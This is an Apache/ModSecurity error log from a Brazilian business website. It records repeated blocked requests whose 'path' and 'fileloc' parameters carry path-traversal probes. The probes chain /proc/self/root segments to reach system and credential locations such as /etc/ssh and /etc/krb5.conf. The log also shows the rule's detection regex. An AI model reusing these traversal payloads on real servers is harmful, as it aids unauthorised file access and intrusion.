[Fri Mar 20 09:03:29.867488 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:48034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03kRCii7xarUs8iHZz7QAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:31.214930 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:48046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03k_XLqtnMIWvjpaKm9AAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:33.328868 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:48060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03lTJ3M9BSuKP7CAYrTAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:35.489065 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:48074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03lta6ubjKNq_cu4binQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:36.834532 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:48082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03mNa6ubjKNq_cu4bioAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:43.339306 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.50:45316] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03n7ninkcc-iUj5ApqWAAAA4k"]
[Fri Mar 20 09:03:54.408636 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:48096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03qhCii7xarUs8iHZ0AQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:03:56.793924 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:45842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:03:59.977052 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:39764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03rta6ubjKNq_cu4biuwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:05:02.829008 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.244.43:43178] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab037vqxLDW4GITHUkT2TQAAARA"]
[Fri Mar 20 09:05:04.869372 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:49726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab038Na6ubjKNq_cu4bjaQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:05:05.398641 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:49726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab038da6ubjKNq_cu4bjbQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:05:06.849018 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:55028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab038gF0L0L-SsrnPo51MgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:05:13.495026 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:55034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03-TJ3M9BSuKP7CAYroQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:05:36.170602 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:35628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04EAF0L0L-SsrnPo51ZAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:05:54.783999 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:57424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04Ita6ubjKNq_cu4bjvAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:05:56.179589 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:49190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04JLninkcc-iUj5ApqvwAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:05:57.555100 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:49194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04JRCii7xarUs8iHZ0UwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:06:05.421967 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.9:51742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:06:05.719110 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 57.141.18.68:51754] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:06:22.487276 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:49208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04Prninkcc-iUj5Apq4QAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:06:32.137002 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:56346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04R_qxLDW4GITHUkT2rwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:06:40.532885 2026] [mime_magic:error] [pid 10189:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:53454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:06:46.735076 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:59830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04Vrninkcc-iUj5AprBQAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:06:49.221537 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:58366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab04WeoXxyEfFpUF8f-NmQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
